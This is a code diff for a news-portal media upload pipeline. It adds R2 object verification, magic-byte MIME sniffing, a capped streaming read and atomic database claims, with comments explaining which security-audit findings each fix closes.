+ * `pending_upload -> uploaded`. The `WHERE status = 'pending_upload'` guard
+ * is this table's mutual-exclusion primitive: Postgres serializes concurrent
+ * `UPDATE`s against the same row, so exactly one concurrent caller ever
+ * transitions a given row out of `pending_upload` — every other caller's
+ * `UPDATE` matches zero rows and gets `null` back. Issue #634's finalize
+ * orchestration (security-auditor High finding, PR #653 review) calls this
+ * with NO `input` at all as the atomic "claim" step BEFORE attempting any
+ * R2 network call — this is what prevents N concurrent `finalize` requests
+ * (different `Idempotency-Key`s, so the idempotency store alone cannot
+ * dedupe them) from each triggering their own expensive R2 `HEAD`+`GET`
+ * for the same object. `sizeBytes`/`checksumSha256` are optional precisely
+ * because at claim time (before the real `GET` has happened) neither is
+ * known yet — `COALESCE` leaves the column untouched (`NULL`, for a fresh
+ * claim) when omitted, so a caller that already knows both values (a
+ * standalone/legacy call site, or a test) can still set them here in one
+ * step, same as before this change. Deliberately NOT an audited action on
+ * its own: "uploaded" only means bytes exist at the object key, not that
+ * they were verified as safe/matching content (`markNewsMediaObjectVerified`
+ * is the audited "verify" action the epic's acceptance criteria actually
+ * requires).
  */
 export async function markNewsMediaObjectUploaded(
   tx: Bun.SQL,
   tenantId: string,
   id: string,
-  input: MarkNewsMediaObjectUploadedInput
+  input: MarkNewsMediaObjectUploadedInput = {}
 ): Promise<NewsMediaObjectView | null> {
   const rows = (await tx`
     UPDATE awcms_mini_news_media_objects
-    SET status = 'uploaded', size_bytes = ${input.sizeBytes},
-        checksum_sha256 = ${input.checksumSha256}, updated_at = now()
+    SET status = 'uploaded',
+        size_bytes = COALESCE(${input.sizeBytes ?? null}, size_bytes),
+        checksum_sha256 = COALESCE(${input.checksumSha256 ?? null}, checksum_sha256),
+        updated_at = now()
     WHERE tenant_id = ${tenantId} AND id = ${id}
       AND status = 'pending_upload' AND deleted_at IS NULL
     RETURNING id, tenant_id, module_key, owner_resource_type, owner_resource_id,
@@ -289,6 +304,16 @@ export async function markNewsMediaObjectUploaded(
 export type MarkNewsMediaObjectVerifiedInput = {
   width?: number;
   height?: number;
+  /**
+   * The REAL size/checksum, computed from the bytes actually read by the
+   * capped streaming `GET` (`news-media-r2-client.ts`'s `getObject`) —
+   * never from a `HEAD` response, which can be stale/raced (security-auditor
+   * Critical finding, PR #653 review). Optional + `COALESCE`d so a caller
+   * that already set them via `markNewsMediaObjectUploaded` (the legacy/
+   * standalone one-step flow) does not need to repeat them here.
+   */
+  sizeBytes?: number;
+  checksumSha256?: string;
 };
 
 /**
@@ -307,6 +332,8 @@ export async function markNewsMediaObjectVerified(
   const rows = (await tx`
     UPDATE awcms_mini_news_media_objects
     SET status = 'verified', width = ${input.width ?? null}, height = ${input.height ?? null},
+        size_bytes = COALESCE(${input.sizeBytes ?? null}, size_bytes),
+        checksum_sha256 = COALESCE(${input.checksumSha256 ?? null}, checksum_sha256),
         updated_at = now()
     WHERE tenant_id = ${tenantId} AND id = ${id}
       AND status = 'uploaded' AND deleted_at IS NULL
@@ -482,6 +509,38 @@ export async function markNewsMediaObjectFailed(
     SET status = 'failed', updated_at = now()
     WHERE tenant_id = ${tenantId} AND id = ${id}
       AND status IN ('pending_upload', 'uploaded') AND deleted_at IS NULL
+    RETURNING id, tenant_id, module_key, owner_resource_type, owner_resource_id,
+      storage_driver, bucket_name, object_key, original_filename, public_url,
+      mime_type, size_bytes, checksum_sha256, width, height, alt_text, caption,
+      status, created_by_tenant_user_id, created_at, updated_at,
+      deleted_at, deleted_by, delete_reason, restored_at, restored_by
+  `) as NewsMediaObjectRow[];
+
+  return rows[0] ? toView(rows[0]) : null;
+}
+
+/**
+ * `uploaded -> pending_upload` — reverts the atomic claim
+ * `markNewsMediaObjectUploaded` makes, ONLY for a transient/infra reason
+ * (R2 provider error, circuit breaker open, timeout) rather than a
+ * definitive content-rejection (that path is `markNewsMediaObjectFailed`,
+ * permanent — the client must start a new upload session). Issue #634's
+ * finalize orchestration (security-auditor High finding, PR #653 review)
+ * claims a row BEFORE calling R2 so concurrent `finalize` calls cannot each
+ * trigger their own R2 round trip; without this revert, a single transient
+ * R2 failure would leave the row stuck in `uploaded` forever with no path
+ * back to a retryable state.
+ */
+export async function revertNewsMediaObjectUploadClaim(
+  tx: Bun.SQL,
+  tenantId: string,
+  id: string
+): Promise<NewsMediaObjectView | null> {
+  const rows = (await tx`
+    UPDATE awcms_mini_news_media_objects
+    SET status = 'pending_upload', updated_at = now()
+    WHERE tenant_id = ${tenantId} AND id = ${id}
+      AND status = 'uploaded' AND deleted_at IS NULL
     RETURNING id, tenant_id, module_key, owner_resource_type, owner_resource_id,
       storage_driver, bucket_name, object_key, original_filename, public_url,
       mime_type, size_bytes, checksum_sha256, width, height, alt_text, caption,

--- a/src/modules/news-portal/application/news-media-r2-verification.ts
+++ b/src/modules/news-portal/application/news-media-r2-verification.ts
@@ -1,0 +1,97 @@
+/**
+ * Orchestrates the finalize step's real R2 verification (Issue #634, epic
+ * `news_portal`) — the fix for the security-auditor Critical finding on
+ * Issue #631: `HEAD` alone is NEVER sufficient to promote a media object to
+ * `verified`. This function performs, in this exact order
+ * (`full-online-r2-architecture.md` §9, `r2-upload-sop.md` §2 step 5):
+ *
+ *   1. `HEAD` (via `NewsMediaR2Client.headObject`) — cheap existence +
+ *      real-size check, short-circuits before any full `GET` for a missing
+ *      or over-size object.
+ *   2. Full `GET` (via `NewsMediaR2Client.getObject`) — reads the object's
+ *      actual bytes.
+ *   3. MIME sniffing from magic bytes (`sniffNewsMediaMimeType`) against
+ *      the bytes from step 2 — NOT `Content-Type`, NOT the file extension,
+ *      NOT the checksum.
+ *   4. Server-side SHA-256 checksum computed from the SAME bytes read in
+ *      step 2.
+ *   5. `decideNewsMediaFinalizeOutcome` — the pure classification of the
+ *      above against the allow-list/claimed mime type/claimed checksum.
+ *
+ * Deliberately takes no `Bun.SQL`/transaction — every call here is a
+ * network call to R2 and must run strictly OUTSIDE any DB transaction
+ * (ADR-0006). The caller (`pages/api/v1/media/news-images/upload-sessions/
+ * [id]/finalize.ts`) runs this between two separate `withTenant` blocks.
+ */
+import type { NewsMediaR2Client } from "../infrastructure/news-media-r2-client";
+import { sniffNewsMediaMimeType } from "../domain/news-media-mime-sniffer";
+import { decideNewsMediaFinalizeOutcome } from "../domain/news-media-finalize-decision";
+
+export type VerifyNewsMediaR2ObjectInput = {
+  objectKey: string;
+  claimedMimeType: string;
+  allowedMimeTypes: string[];
+  maxUploadBytes: number;
+  claimedChecksumSha256: string | null;
+};
+
+export type NewsMediaR2VerificationRejectionReason =
+  | "object_not_found"
+  | "size_exceeded"
+  | "mime_not_recognized"
+  | "mime_not_allowed"
+  | "mime_mismatch"
+  | "checksum_mismatch";
+
+export type NewsMediaR2VerificationResult =
+  | { outcome: "accepted"; sizeBytes: number; checksumSha256: string }
+  | { outcome: "rejected"; reason: NewsMediaR2VerificationRejectionReason }
+  | { outcome: "provider_error"; error: string };
+
+export async function verifyNewsMediaR2Object(
+  client: NewsMediaR2Client,
+  input: VerifyNewsMediaR2ObjectInput
+): Promise<NewsMediaR2VerificationResult> {
+  const head = await client.headObject(input.objectKey);
+
+  if (!head.ok) {
+    return { outcome: "provider_error", error: head.error };
+  }
+
+  if (!head.exists) {
+    return { outcome: "rejected", reason: "object_not_found" };
+  }
+
+  if (head.sizeBytes > input.maxUploadBytes) {
+    return { outcome: "rejected", reason: "size_exceeded" };
+  }
+
+  const get = await client.getObject(input.objectKey);
+
+  if (!get.ok) {
+    return { outcome: "provider_error", error: get.error };
+  }
+
+  const sniffedMimeType = sniffNewsMediaMimeType(get.bytes);
+  const hasher = new Bun.CryptoHasher("sha256");
+  hasher.update(get.bytes);
+  const computedChecksumSha256 = hasher.digest("hex");
+
+  const decision = decideNewsMediaFinalizeOutcome({
+    claimedMimeType: input.claimedMimeType,
+    allowedMimeTypes: input.allowedMimeTypes,
+    sniffedMimeType,
+    claimedChecksumSha256: input.claimedChecksumSha256,
+    computedChecksumSha256
+  });
+
+  if (!decision.accepted) {
+    return { outcome: "rejected", reason: decision.reason };
+  }
+
+  return {
+    outcome: "accepted",
+    sizeBytes: head.sizeBytes,
+    checksumSha256: computedChecksumSha256
+  };
+}

--- a/src/modules/news-portal/application/news-media-r2-verification.ts
+++ b/src/modules/news-portal/application/news-media-r2-verification.ts
@@ -6,22 +6,34 @@
  * (`full-online-r2-architecture.md` §9, `r2-upload-sop.md` §2 step 5):
  *
  *   1. `HEAD` (via `NewsMediaR2Client.headObject`) — cheap existence +
- *      real-size check, short-circuits before any full `GET` for a missing
- *      or over-size object.
- *   2. Full `GET` (via `NewsMediaR2Client.getObject`) — reads the object's
- *      actual bytes.
+ *      size fast-path, short-circuits before any full `GET` for a missing
+ *      or (as R2 reports it right now) over-size object.
+ *   2. Full `GET` (via `NewsMediaR2Client.getObject`), streamed and capped
+ *      at `maxUploadBytes` — reads the object's actual bytes. This is the
+ *      REAL size enforcement (PR #653 review, security-auditor Critical):
+ *      `headObject`'s report can be stale by the time this runs (a
+ *      presigned PUT URL is reusable, so the object at this key can be
+ *      swapped for a much larger one between step 1 and step 2), so a
+ *      `sizeExceeded` result here is treated as authoritative regardless of
+ *      what `HEAD` reported a moment earlier.
  *   3. MIME sniffing from magic bytes (`sniffNewsMediaMimeType`) against
  *      the bytes from step 2 — NOT `Content-Type`, NOT the file extension,
  *      NOT the checksum.
- *   4. Server-side SHA-256 checksum computed from the SAME bytes read in
- *      step 2.
+ *   4. Server-side SHA-256 checksum, AND the authoritative `sizeBytes`,
+ *      both computed from the SAME bytes actually read in step 2 — never
+ *      from `head.sizeBytes`.
  *   5. `decideNewsMediaFinalizeOutcome` — the pure classification of the
  *      above against the allow-list/claimed mime type/claimed checksum.
  *
  * Deliberately takes no `Bun.SQL`/transaction — every call here is a
  * network call to R2 and must run strictly OUTSIDE any DB transaction
- * (ADR-0006). The caller (`pages/api/v1/media/news-images/upload-sessions/
- * [id]/finalize.ts`) runs this between two separate `withTenant` blocks.
+ * (ADR-0006). The caller (`application/news-media-finalize-upload-session.ts`)
+ * runs this between two separate `withTenant` blocks, and only after having
+ * already atomically claimed the row (`pending_upload -> uploaded`) in the
+ * first of those — see that module's header for why (security-auditor
+ * High finding, PR #653 review: without that claim, concurrent `finalize`
+ * calls using different `Idempotency-Key`s would each reach this function
+ * and each pay for their own `HEAD`+`GET` against the same object).
  */
 import type { NewsMediaR2Client } from "../infrastructure/news-media-r2-client";
 import { sniffNewsMediaMimeType } from "../domain/news-media-mime-sniffer";
@@ -63,13 +75,22 @@ export async function verifyNewsMediaR2Object(
   }
 
   if (head.sizeBytes > input.maxUploadBytes) {
+    // Fast-path only — still re-checked authoritatively below regardless.
     return { outcome: "rejected", reason: "size_exceeded" };
   }
 
-  const get = await client.getObject(input.objectKey);
+  const get = await client.getObject(input.objectKey, input.maxUploadBytes);
 
   if (!get.ok) {
     return { outcome: "provider_error", error: get.error };
+  }
+
+  if (get.sizeExceeded) {
+    // The authoritative check: the object actually read exceeds the cap,
+    // regardless of what `HEAD` reported a moment earlier (TOCTOU — the
+    // presigned PUT URL can be reused to swap the object between HEAD and
+    // GET). No bytes were fully buffered for this outcome.
+    return { outcome: "rejected", reason: "size_exceeded" };
   }
 
   const sniffedMimeType = sniffNewsMediaMimeType(get.bytes);
@@ -91,7 +112,9 @@ export async function verifyNewsMediaR2Object(
 
   return {
     outcome: "accepted",
-    sizeBytes: head.sizeBytes,
+    // Authoritative — the length of the bytes actually read in step 2,
+    // never `head.sizeBytes`.
+    sizeBytes: get.bytes.byteLength,
     checksumSha256: computedChecksumSha256
   };
 }

--- a/src/modules/news-portal/domain/news-media-finalize-decision.ts
+++ b/src/modules/news-portal/domain/news-media-finalize-decision.ts
@@ -1,0 +1,75 @@
+/**
+ * Pure decision logic for the `finalize` step of the direct-to-R2 presigned
+ * upload flow (Issue #634, epic `news_portal`). No I/O — the caller
+ * (`application/news-media-r2-verification.ts`) has already done the real
+ * `HEAD`/`GET` against R2 and the MIME sniffing/checksum computation; this
+ * function only classifies the already-computed facts.
+ *
+ * Order follows `full-online-r2-architecture.md` §9 exactly (size is checked
+ * earlier by the caller, from the `HEAD` result, before the full `GET` even
+ * happens — see that module's own header comment for why): MIME sniffing
+ * result against the allow-list, then against the client's claimed
+ * `mimeType`, then (only if the client supplied one) the checksum claim
+ * against the server-computed checksum. A checksum mismatch alone never
+ * overrides a passing MIME sniff into a MIME acceptance and vice versa —
+ * every check must pass (`full-online-r2-architecture.md` §9 point 6,
+ * "defense in depth... tidak ada langkah yang dilewati").
+ */
+
+export type NewsMediaFinalizeRejectionReason =
+  | "mime_not_recognized"
+  | "mime_not_allowed"
+  | "mime_mismatch"
+  | "checksum_mismatch";
+
+export type NewsMediaFinalizeDecision =
+  | { accepted: true }
+  | { accepted: false; reason: NewsMediaFinalizeRejectionReason };
+
+export type NewsMediaFinalizeDecisionInput = {
+  /** `mimeType` claimed when the upload session was created (step 1). */
+  claimedMimeType: string;
+  /** The deployment's configured allow-list (`news-media-r2-config.ts`). */
+  allowedMimeTypes: string[];
+  /**
+   * Result of `sniffNewsMediaMimeType` against the bytes actually read from
+   * R2 — `undefined` when the content matches no recognized image
+   * signature (this is exactly what an HTML/JS payload disguised with a
+   * `.jpg` name/claimed mime type sniffs to).
+   */
+  sniffedMimeType: string | undefined;
+  /**
+   * Optional client-claimed checksum from the finalize request. Per §9,
+   * this is used ONLY to detect transport corruption — never as a
+   * substitute for the MIME sniff above.
+   */
+  claimedChecksumSha256: string | null;
+  /** SHA-256 computed server-side from the bytes actually read from R2. */
+  computedChecksumSha256: string;
+};
+
+export function decideNewsMediaFinalizeOutcome(
+  input: NewsMediaFinalizeDecisionInput
+): NewsMediaFinalizeDecision {
+  if (!input.sniffedMimeType) {
+    return { accepted: false, reason: "mime_not_recognized" };
+  }
+
+  if (!input.allowedMimeTypes.includes(input.sniffedMimeType)) {
+    return { accepted: false, reason: "mime_not_allowed" };
+  }
+
+  if (input.sniffedMimeType !== input.claimedMimeType.toLowerCase().trim()) {
+    return { accepted: false, reason: "mime_mismatch" };
+  }
+
+  if (
+    input.claimedChecksumSha256 &&
+    input.claimedChecksumSha256.toLowerCase() !==
+      input.computedChecksumSha256.toLowerCase()
+  ) {
+    return { accepted: false, reason: "checksum_mismatch" };
+  }
+
+  return { accepted: true };
+}

--- a/src/modules/news-portal/domain/news-media-mime-sniffer.ts
+++ b/src/modules/news-portal/domain/news-media-mime-sniffer.ts
@@ -1,0 +1,76 @@
+/**
+ * MIME sniffing from magic bytes (Issue #634, epic `news_portal`). Pure — no
+ * network/DB access, takes only the bytes already read from R2 by the
+ * caller (`application/news-media-r2-verification.ts`).
+ *
+ * ## Why allow-list sniffing, not a generic magic-byte detector
+ *
+ * `full-online-r2-architecture.md` §9 and the security-auditor finding on
+ * Issue #631 (the finding this whole issue exists to close) require the
+ * `confirm`/finalize step to run MIME sniffing against the object's actual
+ * bytes rather than trust `Content-Type`, the file extension, or the
+ * client's claimed `mimeType` — none of those are proof of what the bytes
+ * actually are. This module only tries to POSITIVELY recognize the four
+ * mime types `news-media-r2-config.ts` allows by default (JPEG/PNG/WebP/
+ * GIF). Anything else — including a `.jpg`-named/labeled file that is
+ * actually HTML/JS (the exact exploit scenario the security audit called
+ * out) — returns `undefined` ("not a recognized image"), which
+ * `news-media-finalize-decision.ts` always treats as a hard reject. This is
+ * deliberately allow-list-only (not a blocklist trying to enumerate every
+ * dangerous format) — a payload sniffing to `undefined` is rejected
+ * regardless of what it actually is.
+ */
+
+export type SniffedNewsMediaMimeType =
+  "image/jpeg" | "image/png" | "image/webp" | "image/gif";
+
+const JPEG_MAGIC = [0xff, 0xd8, 0xff];
+const PNG_MAGIC = [0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a];
+const GIF_MAGIC_PREFIX = [0x47, 0x49, 0x46, 0x38]; // "GIF8"
+const GIF_VERSION_A = 0x61; // "a" — closes "87a"/"89a"
+const RIFF_MAGIC = [0x52, 0x49, 0x46, 0x46]; // "RIFF"
+const WEBP_MAGIC = [0x57, 0x45, 0x42, 0x50]; // "WEBP", at byte offset 8
+
+function matchesAt(
+  bytes: Uint8Array,
+  offset: number,
+  signature: number[]
+): boolean {
+  if (bytes.length < offset + signature.length) return false;
+
+  for (let i = 0; i < signature.length; i += 1) {
+    if (bytes[offset + i] !== signature[i]) return false;
+  }
+
+  return true;
+}
+
+/**
+ * Returns the recognized mime type for `bytes`, or `undefined` when the
+ * content does not match any allow-listed image signature. Never throws.
+ */
+export function sniffNewsMediaMimeType(
+  bytes: Uint8Array
+): SniffedNewsMediaMimeType | undefined {
+  if (matchesAt(bytes, 0, JPEG_MAGIC)) {
+    return "image/jpeg";
+  }
+
+  if (matchesAt(bytes, 0, PNG_MAGIC)) {
+    return "image/png";
+  }
+
+  if (
+    matchesAt(bytes, 0, GIF_MAGIC_PREFIX) &&
+    (bytes[4] === 0x37 || bytes[4] === 0x39) &&
+    bytes[5] === GIF_VERSION_A
+  ) {
+    return "image/gif";
+  }
+
+  if (matchesAt(bytes, 0, RIFF_MAGIC) && matchesAt(bytes, 8, WEBP_MAGIC)) {
+    return "image/webp";
+  }
+
+  return undefined;
+}

--- a/src/modules/news-portal/domain/news-media-permissions.ts
+++ b/src/modules/news-portal/domain/news-media-permissions.ts
@@ -27,11 +27,11 @@
 export const NEWS_MEDIA_PERMISSION_ACTIVITY_CODE = "media";
 
 export const NEWS_MEDIA_PERMISSIONS = {
-  /** Create a pending media object metadata record. */
+  /** Create a pending media object metadata record (also gates starting a presigned upload session, Issue #634). */
   create: "news_portal.media.create",
   /** Read media object metadata (list/detail). */
   read: "news_portal.media.read",
-  /** Mark an uploaded object verified (MIME/checksum/dimension check passed). */
+  /** Mark an uploaded object verified (MIME/checksum/dimension check passed) — also gates the finalize endpoint, Issue #634. */
   verify: "news_portal.media.verify",
   /** Attach a verified media object to an owning blog/news resource. */
   attach: "news_portal.media.attach",
@@ -42,7 +42,19 @@ export const NEWS_MEDIA_PERMISSIONS = {
   /** Restore a soft-deleted media object. */
   restore: "news_portal.media.restore",
   /** Hard purge an already soft-deleted media object. */
-  purge: "news_portal.media.purge"
+  purge: "news_portal.media.purge",
+  /**
+   * Abort one's own not-yet-uploaded upload session (Issue #634). New in
+   * this issue — #633's original set (create/read/verify/attach/detach/
+   * delete/restore/purge) had no "cancel" concept yet because no upload
+   * session existed. Reuses the existing `AccessAction` union member
+   * `"cancel"` (`identity-access/domain/access-control.ts`, already used by
+   * sync/POS cancel flows) — a distinct permission from `delete` because
+   * cancelling a `pending_upload` session (nothing was ever verified/
+   * attached) is a materially lower-risk action than soft-deleting a real,
+   * previously-verified media object.
+   */
+  cancel: "news_portal.media.cancel"
 } as const;
 
 export type NewsMediaPermissionKey = keyof typeof NEWS_MEDIA_PERMISSIONS;

--- a/src/modules/news-portal/domain/news-media-upload-session-validation.ts
+++ b/src/modules/news-portal/domain/news-media-upload-session-validation.ts
@@ -1,0 +1,190 @@
+/**
+ * Request-shape validation for the presigned upload session endpoints
+ * (Issue #634, epic `news_portal`). Pure — no DB/network access. Follows
+ * `blog-content/domain/blog-post-validation.ts`'s
+ * `{ valid: true; value } | { valid: false; errors }` convention.
+ *
+ * `r2-upload-sop.md` §2 step 1 validates SHAPE ONLY at create time (no bytes
+ * exist yet to check content against) — `mimeType` must be in the
+ * deployment's configured allow-list and `byteSize` must not exceed
+ * `NEWS_MEDIA_R2_MAX_UPLOAD_BYTES`. Neither is persisted verbatim: the
+ * object key's real extension is derived from the validated `mimeType`
+ * (`news-media-object-key.ts`), and the real `size_bytes` column is only
+ * ever populated later from R2's own `HEAD` response at finalize time
+ * (`markNewsMediaObjectUploaded`) — the client's claimed `byteSize` here is
+ * only an early, cheap rejection of an obviously-oversized request before
+ * any presigned URL is even generated.
+ */
+
+export type ValidationError = {
+  field: string;
+  message: string;
+};
+
+const MAX_TEXT_FIELD_LENGTH = 500;
+
+export type CreateNewsMediaUploadSessionInput = {
+  mimeType: string;
+  byteSize: number;
+  originalFilename: string | null;
+  altText: string | null;
+  caption: string | null;
+};
+
+export type CreateNewsMediaUploadSessionValidationResult =
+  | { valid: true; value: CreateNewsMediaUploadSessionInput }
+  | { valid: false; errors: ValidationError[] };
+
+function validateOptionalText(
+  raw: unknown,
+  field: string,
+  errors: ValidationError[]
+): string | null {
+  if (raw === undefined || raw === null) return null;
+
+  if (typeof raw !== "string") {
+    errors.push({ field, message: `${field} must be a string.` });
+    return null;
+  }
+
+  const trimmed = raw.trim();
+
+  if (trimmed.length === 0) return null;
+
+  if (trimmed.length > MAX_TEXT_FIELD_LENGTH) {
+    errors.push({
+      field,
+      message: `${field} must be at most ${MAX_TEXT_FIELD_LENGTH} characters.`
+    });
+    return null;
+  }
+
+  return trimmed;
+}
+
+export function validateCreateNewsMediaUploadSessionInput(
+  raw: unknown,
+  allowedMimeTypes: string[],
+  maxUploadBytes: number
+): CreateNewsMediaUploadSessionValidationResult {
+  const errors: ValidationError[] = [];
+
+  if (!raw || typeof raw !== "object") {
+    return {
+      valid: false,
+      errors: [{ field: "body", message: "Request body must be an object." }]
+    };
+  }
+
+  const body = raw as Record<string, unknown>;
+
+  let mimeType = "";
+  if (typeof body.mimeType !== "string" || body.mimeType.trim().length === 0) {
+    errors.push({ field: "mimeType", message: "mimeType is required." });
+  } else {
+    mimeType = body.mimeType.toLowerCase().trim();
+    if (!allowedMimeTypes.includes(mimeType)) {
+      errors.push({
+        field: "mimeType",
+        message: `mimeType must be one of: ${allowedMimeTypes.join(", ")}.`
+      });
+    }
+  }
+
+  let byteSize = 0;
+  if (
+    typeof body.byteSize !== "number" ||
+    !Number.isFinite(body.byteSize) ||
+    !Number.isInteger(body.byteSize) ||
+    body.byteSize <= 0
+  ) {
+    errors.push({
+      field: "byteSize",
+      message: "byteSize must be a positive integer."
+    });
+  } else {
+    byteSize = body.byteSize;
+    if (byteSize > maxUploadBytes) {
+      errors.push({
+        field: "byteSize",
+        message: `byteSize must not exceed ${maxUploadBytes} bytes.`
+      });
+    }
+  }
+
+  const originalFilename = validateOptionalText(
+    body.originalFilename,
+    "originalFilename",
+    errors
+  );
+  const altText = validateOptionalText(body.altText, "altText", errors);
+  const caption = validateOptionalText(body.caption, "caption", errors);
+
+  if (errors.length > 0) {
+    return { valid: false, errors };
+  }
+
+  return {
+    valid: true,
+    value: { mimeType, byteSize, originalFilename, altText, caption }
+  };
+}
+
+const SHA256_HEX_PATTERN = /^[0-9a-f]{64}$/i;
+
+export type FinalizeNewsMediaUploadSessionInput = {
+  checksumSha256: string | null;
+};
+
+export type FinalizeNewsMediaUploadSessionValidationResult =
+  | { valid: true; value: FinalizeNewsMediaUploadSessionInput }
+  | { valid: false; errors: ValidationError[] };
+
+/**
+ * `checksumSha256` is optional (issue's own acceptance criteria: "Optional
+ * checksum SHA-256") — when present it must be a well-formed SHA-256 hex
+ * digest. Per §9, a match/mismatch here only ever detects transport
+ * corruption; it is never sufficient on its own to accept an upload (see
+ * `news-media-finalize-decision.ts`).
+ */
+export function validateFinalizeNewsMediaUploadSessionInput(
+  raw: unknown
+): FinalizeNewsMediaUploadSessionValidationResult {
+  // An absent/empty body is valid — checksum is optional.
+  if (raw === null || raw === undefined) {
+    return { valid: true, value: { checksumSha256: null } };
+  }
+
+  if (typeof raw !== "object") {
+    return {
+      valid: false,
+      errors: [{ field: "body", message: "Request body must be an object." }]
+    };
+  }
+
+  const body = raw as Record<string, unknown>;
+
+  if (body.checksumSha256 === undefined || body.checksumSha256 === null) {
+    return { valid: true, value: { checksumSha256: null } };
+  }
+
+  if (
+    typeof body.checksumSha256 !== "string" ||
+    !SHA256_HEX_PATTERN.test(body.checksumSha256)
+  ) {
+    return {
+      valid: false,
+      errors: [
+        {
+          field: "checksumSha256",
+          message: "checksumSha256 must be a 64-character hex SHA-256 digest."
+        }
+      ]
+    };
+  }
+
+  return {
+    valid: true,
+    value: { checksumSha256: body.checksumSha256.toLowerCase() }
+  };
+}

--- a/src/modules/news-portal/infrastructure/news-media-r2-client.ts
+++ b/src/modules/news-portal/infrastructure/news-media-r2-client.ts
@@ -18,6 +18,24 @@
  * uniform (rather than "only the genuinely-networked calls count") avoids
  * a future refactor accidentally moving a real network call inside a
  * transaction by analogy with this one.
+ *
+ * ## `getObject` streaming size cap (security-auditor Critical finding, PR #653 review)
+ *
+ * `getObject` used to be a single `file.arrayBuffer()` call — buffer
+ * everything, THEN let the caller check the size. That is a TOCTOU hole: a
+ * presigned PUT URL is not single-use, so between a `headObject` call
+ * reporting a small size and this `getObject` call actually running, an
+ * attacker can re-PUT a multi-gigabyte object to the SAME key (still
+ * starting with valid image magic bytes, so the MIME sniff would still
+ * pass). `file.arrayBuffer()` would then buffer the ENTIRE object into the
+ * Bun process's memory — a process that serves every tenant — before this
+ * function ever gets a chance to reject it for size. `getObject` now reads
+ * the object as a stream (`S3File.stream()`) and aborts (cancels the
+ * stream) the moment the running total exceeds `maxBytes`, WITHOUT ever
+ * buffering more than `maxBytes` worth of chunks. `headObject`'s own size
+ * check is kept as a cheap fast-path (skip an attempt entirely for an
+ * object R2 already reports as too big), but it is no longer the only line
+ * of defense — the real enforcement now happens during the read itself.
  */
 import { getProviderCircuitBreaker } from "../../../lib/database/circuit-breaker";
 import { withTimeout } from "../../../lib/integration/timeout";
@@ -54,7 +72,9 @@ export type NewsMediaR2HeadResult =
   | { ok: false; error: string };
 
 export type NewsMediaR2GetResult =
-  { ok: true; bytes: Uint8Array } | { ok: false; error: string };
+  | { ok: true; sizeExceeded: false; bytes: Uint8Array }
+  | { ok: true; sizeExceeded: true }
+  | { ok: false; error: string };
 
 export type NewsMediaR2Client = {
   /**
@@ -64,23 +84,75 @@ export type NewsMediaR2Client = {
    */
   presignUploadUrl(input: NewsMediaR2PresignUploadInput): string;
   /**
-   * Cheap existence + size check (§9 step 1) — always run BEFORE
-   * `getObject`, so an object that is already known to be missing or
-   * over-size never wastes bandwidth on a full `GET`.
+   * Cheap existence + size check (§9 step 1) — a fast-path only. An object
+   * this reports as within-bounds is NOT trusted on its own; `getObject`
+   * re-enforces the size cap itself against the bytes it actually reads,
+   * because this value can be stale by the time `getObject` runs (a
+   * presigned PUT URL can be reused to overwrite the same key).
    */
   headObject(objectKey: string): Promise<NewsMediaR2HeadResult>;
   /**
-   * Full object `GET` (§9 steps 2/5) — the caller must have already
-   * confirmed via `headObject` that the real size is within
-   * `NEWS_MEDIA_R2_MAX_UPLOAD_BYTES`; this method does not itself cap the
-   * read, by design, because a partial/ranged read cannot be used for
-   * either MIME sniffing (needs the leading bytes at minimum, but a
-   * corrupt/truncated read could still coincidentally sniff clean) or a
-   * checksum that means anything (a checksum of a truncated read digest is
-   * NOT the checksum of the uploaded object).
+   * Full object `GET` (§9 steps 2/5), read as a stream and capped at
+   * `maxBytes` — the read is aborted the moment the running total exceeds
+   * `maxBytes`, without ever buffering more than that much (see this
+   * module's header). Returns `{ ok: true, sizeExceeded: true }` (no
+   * `bytes`) rather than throwing, so a legitimately-oversized/maliciously
+   * swapped object is a normal rejection outcome, not an error path.
    */
-  getObject(objectKey: string): Promise<NewsMediaR2GetResult>;
+  getObject(objectKey: string, maxBytes: number): Promise<NewsMediaR2GetResult>;
 };
+
+/**
+ * Reads `stream` incrementally, accumulating chunks only up to `maxBytes`.
+ * The instant the running total exceeds `maxBytes`, the stream is cancelled
+ * and `null` is returned — chunks already buffered are dropped and no
+ * further reads happen, so memory use is bounded at (at most) `maxBytes`
+ * plus one chunk, never the full object size.
+ */
+// Exported for direct, network-independent unit testing (`readCappedStream`
+// against a synthetic `ReadableStream` proves the abort-before-fully-
+// buffering property deterministically — going only through a real
+// `Bun.S3Client`/loopback HTTP server is not reliable for this, since OS/Bun
+// socket-level read-ahead buffering can race far ahead of this function's
+// own per-chunk consumption on a fast local link, independent of whether
+// this function's cap logic is correct).
+export async function readCappedStream(
+  stream: ReadableStream<Uint8Array>,
+  maxBytes: number
+): Promise<Uint8Array | null> {
+  const reader = stream.getReader();
+  const chunks: Uint8Array[] = [];
+  let total = 0;
+
+  while (true) {
+    const { done, value } = await reader.read();
+
+    if (done) break;
+    if (!value || value.byteLength === 0) continue;
+
+    total += value.byteLength;
+
+    if (total > maxBytes) {
+      await reader
+        .cancel("news-media-r2: object exceeds maxUploadBytes, aborting read")
+        .catch(() => {
+          // Best-effort — the read is already being abandoned either way.
+        });
+      return null;
+    }
+
+    chunks.push(value);
+  }
+
+  const bytes = new Uint8Array(total);
+  let offset = 0;
+  for (const chunk of chunks) {
+    bytes.set(chunk, offset);
+    offset += chunk.byteLength;
+  }
+
+  return bytes;
+}
 
 export function createNewsMediaR2Client(
   config: NewsMediaR2ClientConfig
@@ -146,7 +218,7 @@ export function createNewsMediaR2Client(
       }
     },
 
-    async getObject(objectKey) {
+    async getObject(objectKey, maxBytes) {
       const attemptedAt = new Date();
 
       if (!breaker.canAttempt(attemptedAt)) {
@@ -158,14 +230,19 @@ export function createNewsMediaR2Client(
 
       try {
         const file = client.file(objectKey);
-        const buffer = await withTimeout(
-          file.arrayBuffer(),
+        const bytes = await withTimeout(
+          readCappedStream(file.stream(), maxBytes),
           timeoutMs,
           `news-media-r2 GET ${objectKey}`
         );
 
         breaker.recordSuccess(new Date());
-        return { ok: true, bytes: new Uint8Array(buffer) };
+
+        if (bytes === null) {
+          return { ok: true, sizeExceeded: true };
+        }
+
+        return { ok: true, sizeExceeded: false, bytes };
       } catch (error) {
         breaker.recordFailure(new Date());
         const message = error instanceof Error ? error.message : String(error);

--- a/src/modules/news-portal/infrastructure/news-media-r2-client.ts
+++ b/src/modules/news-portal/infrastructure/news-media-r2-client.ts
